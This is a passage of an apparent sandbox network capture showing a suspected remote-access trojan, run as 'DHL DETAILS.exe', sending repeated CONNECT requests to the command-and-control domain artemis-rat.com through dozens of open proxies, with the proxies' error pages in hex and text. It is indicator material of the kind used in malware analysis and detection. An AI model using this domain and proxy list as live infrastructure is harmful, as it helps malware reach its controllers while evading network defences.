Mar 9, 2024 13:14:20.333517075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1678	192.168.2.5	55085	94.131.106.208	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.334552050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177052021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.176933050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.067600965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.676909924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1679	192.168.2.5	55074	94.16.112.223	9353	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.334928989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1680	192.168.2.5	55095	8.217.44.229	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.335175037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1681	192.168.2.5	55043	185.101.16.52	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.335652113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1682	192.168.2.5	55039	103.118.46.177	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.338114023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1683	192.168.2.5	55071	161.97.74.176	30000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.338114977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.652225018 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1684	192.168.2.5	55052	43.155.170.35	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.338224888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1685	192.168.2.5	50457	122.185.183.194	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.338351011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1686	192.168.2.5	55077	91.189.177.188	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.338351011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.658817053 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1687	192.168.2.5	55163	162.159.242.252	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.339761019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.507213116 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1688	192.168.2.5	55190	38.162.3.74	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.343476057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.760405064 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1689	192.168.2.5	55068	139.224.64.191	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.397627115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.744771004 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1690	192.168.2.5	54633	123.56.1.50	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.401756048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.726852894 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1691	192.168.2.5	55067	222.174.178.122	4999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.402364969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177158117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1692	192.168.2.5	50658	181.212.136.34	48993	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.407783031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1693	192.168.2.5	55142	47.243.92.199	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.407948971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.711860895 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1694	192.168.2.5	54419	138.36.150.16	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.412388086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1695	192.168.2.5	50929	162.214.225.223	31473	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.412564993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1696	192.168.2.5	55169	147.75.34.86	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
